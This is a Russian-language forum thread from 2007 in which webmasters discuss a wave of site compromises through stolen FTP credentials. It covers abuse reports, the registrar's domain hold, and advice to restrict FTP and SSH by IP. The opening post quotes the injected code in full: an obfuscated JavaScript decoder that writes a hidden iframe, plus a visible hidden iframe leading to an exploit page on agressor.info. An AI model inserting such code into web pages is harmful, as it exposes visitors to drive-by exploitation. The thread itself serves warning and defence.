С нами с 22.10.02
Сообщения: 349
Рейтинг: 98
|
 Добавлено: 16/05/07 в 03:19 |
Извените за нецензурные вырожения!
Какой казел владелец домена agressor.info
Млять зае...и трояноми спи..ли пороли к фтп и впиз....ли туда во все индексы и некоторые фалы а точнее почти во все
| Код: | <script language='JavaScript'><!--
function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='060105102114097109101032119105100116104061049032104101105103104116061049032098111114100101114061048';
s=s+'032102114097109101098111114100101114061048032115114099061034104116116112058047047119109105103114097';
s=s+'046111114103047109112097099107047105110100101120046112104112034062060047105102114097109101062';
t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();
//--></script><iframe src='http://agressor.info/exp/index.php' width='1' height='1' style='visibility: hidden;'></iframe> |
ведт все IFRAME: хttp://agressor.info/exp/index.php
На сервере убило практически все.
Это каким нада быть казлом что бы такое делать?
Мне и за год не востановить все что было убито, потому как несколько дней подрят это все продолжалось, а заметил только сегодня случайно.
Так что будте осторожны!
по названию домена можно подумать что человек под ником agressor если это так то блин был же нормальный АВМ адекватный.
|
|
|
|
| |
С нами с 08.06.04
Сообщения: 5651
Рейтинг: 1681
|
| Добавлено: 16/05/07 в 11:00 |
Да, эпидемия в последнее время прям, много кого поломали угоняя пароли от фтп...Как уже не раз советовалось, закрывай доступ к фтп, оставляй для своего диапазона ипов.
|
|
|
|
Начальник отдела по борьбе с инопланетянами 2-го городского лечебно-трудового профилактория.
|
4
|
|
| |
Old Oil Barrel
С нами с 09.09.04
Сообщения: 58531
Рейтинг: 14265
 
|
| Добавлено: 16/05/07 в 14:13 |
пидарок продолжает красть траф
пиши абузу регистратору домена
|
|
|
|
| |
Деньги из воздуха...
С нами с 26.09.04
Сообщения: 3797
Рейтинг: 2283
|
| Добавлено: 16/05/07 в 14:19 |
Ага, регистратору абуз. они домен с ТДС выключат быстро.
|
|
|
|
| |
С нами с 13.01.03
Сообщения: 6109
Рейтинг: 1962
|
| Добавлено: 16/05/07 в 14:25 |
Цена вопроса - $1
Судя по тому что эпидемия уже месяца 3 продолжается - значит оправдывает себя. Мы в свое время тоже попали под эту дрянь...
Советы: если дедик, то закрыть FTP и SSH фаирволом. И еще - если даете доступ сторонним людям (например суппорту скриптов), то меняйте сразу как только работы закончены. У нас, по весьма высокой вероятности, утечка произошла как раз от третьих лиц. Т.е. лоханулись сами - забыли сменить.
|
|
|
|
| |
С нами с 22.10.02
Сообщения: 349
Рейтинг: 98
|
| Добавлено: 17/05/07 в 11:36 |
Домен забанили!
Но это не выход, он зарегает новый и все начнет по новой 
Абуз написал и хостеру.
Если бы его забанить чем нить по голове 
|
|
|
|
| |
С нами с 22.10.02
Сообщения: 349
Рейтинг: 98
|
| Добавлено: 18/05/07 в 00:33 |
Мля сначала написали что забанили а сейчас вот что ответили
| Код: | к сожалению, мы не можем закрыть домен за такое. За это ответственна компания предоставляющая хостинг этому домену в данном случае это, как я понимаю: http://whois.domaintools.com/203.121.71.165
Там написаны контактные данные хостера. Приносим свои извинения за неудобства причиняемые нашими клиентами, но по правилам ICANN ничего с этим мы сделать не можем. |
Странно но статус такой у домена
Address lookup
lookup failed agressor.info
Could not find an IP address for this domain name.
Domain ID:D16741187-LRMS
Domain Name:AGRESSOR.INFO
Created On:05-Mar-2007 15:10:51 UTC
Last Updated On:17-May-2007 08:20:42 UTC
Expiration Date:05-Mar-2008 15:10:51 UTC
Sponsoring Registrar:EstDomains, Inc. (R295-LRMS)
Status:CLIENT HOLD
Кстати я что единственный кто накатал абуз, или просто не на этот домен у других редиректило трафф?
|
|
|
|
| |
С нами с 13.01.03
Сообщения: 6109
Рейтинг: 1962
|
| Добавлено: 18/05/07 в 00:44 |
| art-s писал: | | Мля сначала написали что забанили а сейчас вот что ответили |
Прикольно...
А потом появляются топики где удивляется народ за что это буржуи банят этого регистратора...
|
|
|
|
| |
С нами с 22.10.02
Сообщения: 349
Рейтинг: 98
|
| Добавлено: 18/05/07 в 01:14 |
Так я не понял прикола, домен всетаки забанили или отрубили хост ему, не понятно как то неужели подействовало письмо хостеру?
|
|
|
|
| |
С нами с 24.10.04
Сообщения: 42
Рейтинг: 95
|
| Добавлено: 18/05/07 в 07:18 |
для доменов ORG, .BIZ, .INFO and .NAME статус CLIENT HOLD это тоже самое что и REGISTRAR-HOLD.
REGISTRAR-HOLD: Sponsoring registrar sets this status. The domain can not be modified or deleted. The registrar must remove REGISTRAR-HOLD status to modify the domain. The domain can be renewed. The domain will not be included in the zone. Typically denotes non-payment, expiration, or a domain subject to a legal dispute.
что означает что этот домен залочен регистратором.
проверяем:
судя по whois для домена AGRESSOR.INFO прописаны днс сервера
Name Server:NS1.HACKHOST.BIZ
Name Server:NS2.HACKHOST.BIZ
эти днс сервера выдают ip для домена AGRESSOR.INFO но сам домен не резолвится.
судя по тому, что
telnet 203.121.71.165 80
Trying 203.121.71.165...
telnet: connect to address 203.121.71.165: Connection refused
telnet: Unable to connect to remote host
хостер его сайт тоже закрыл.
|
|
|
|
| |
Деньги из воздуха...
С нами с 26.09.04
Сообщения: 3797
Рейтинг: 2283
|
| Добавлено: 18/05/07 в 07:27 |
очень странное поведение ESTdomains... В случае когда ломали нас, Klikdomains сразу же, когда им показали, куда ведет ифрейм со страницы, выключил домен с ТДС читерам. Хостеры далеко не так оперативны, да и могут забить некоторые на подобные абузы.
|
|
|
|
| |
XXX-Server.biz
С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676
|
| Добавлено: 18/05/07 в 07:44 |
лучше найди с какого IP к FTP коннектились когда файлы меняли и туда абузу напиши, с приложением логов
|
|
|
|
| |
С нами с 22.10.02
Сообщения: 349
Рейтинг: 98
|
| Добавлено: 18/05/07 в 09:32 |
Я так и сделал!
И по видимому помогло, письмо короткое былу но очень убедительное, что им лучше отключить было этого клиента.
|
|
|
|
| |
С нами с 12.05.06
Сообщения: 132
Рейтинг: 29
|
| Добавлено: 18/05/07 в 14:01 |
Та же беда.
Троян уволок ftp входы.
Эти мудаки стали вешать ифрыймы свои. Адрес о котором говориться выше сменился, теперь ифрэйм указывает на t-error.biz
Утечка ftp происходит именно троянами
|
|
|
|
| |
С нами с 22.10.02
Сообщения: 349
Рейтинг: 98
|
| Добавлено: 21/05/07 в 20:41 |
Мля помойму из за этой засады побанили мне и домены и IP фид провайдеры
Убить пиздюка!!!
|
|
|
|
| |
ABC Mobile
С нами с 29.08.05
Сообщения: 819
Рейтинг: 485
|
| Добавлено: 21/05/07 в 21:32 |
Один из моих клиентов подхватил такую пакость. Благо быстро сменили все пассы на доступ и почистили сайт. Ограничилось одним сайтом всего, да и то - в 5.30 сломали, в 6.30 уже исправили
|
|
|
|
Traffic. Leads. Conversion. SEO.
|
0
|
|
| |
С нами с 25.08.05
Сообщения: 313
Рейтинг: 231
|
| Добавлено: 23/06/07 в 16:55 |
пиздец, и я попался... два сервака..
откуда утечка пока не пойму...
|
|
|
|
| |
Деньги из воздуха...
С нами с 26.09.04
Сообщения: 3797
Рейтинг: 2283
|
| Добавлено: 23/06/07 в 18:54 |
Ребяты, ну включите Вы защиту по айпи на серверах. И все на у нас этом проблемы кончились... пусть воруют пароли скока хотят, их на ФТП не пустит просто.
|
|
|
|
| |
С нами с 02.09.06
Сообщения: 598
Рейтинг: 613
|
| Добавлено: 23/06/07 в 23:09 |
Огласите весь список, пожалста. )) Кого фильтровать и кто будет списки составлять?
|
|
|
|
| |
С нами с 01.04.06
Сообщения: 105
Рейтинг: 208
|
| Добавлено: 23/06/07 в 23:14 |
| ritor писал: | | Ребяты, ну включите Вы защиту по айпи на серверах. И все на у нас этом проблемы кончились... пусть воруют пароли скока хотят, их на ФТП не пустит просто. |
А если IP динамический ?
|
|
|
|
| |
XXX-Server.biz
С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676
|
| Добавлено: 23/06/07 в 23:17 |
| iNT. писал: | | А если IP динамический ? |
ну все равно ж он из одной подсетки будет. вот ее и добавлять
|
|
|
|
| |
XXX-Server.biz
С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676
|
| Добавлено: 23/06/07 в 23:17 |
| supphosting.com писал: | | Огласите весь список, пожалста. )) Кого фильтровать |
всех кроме клиентов
| Цитата: |
и кто будет списки составлять? |
саппорт, кто ж еще
|
|
|
|
| |
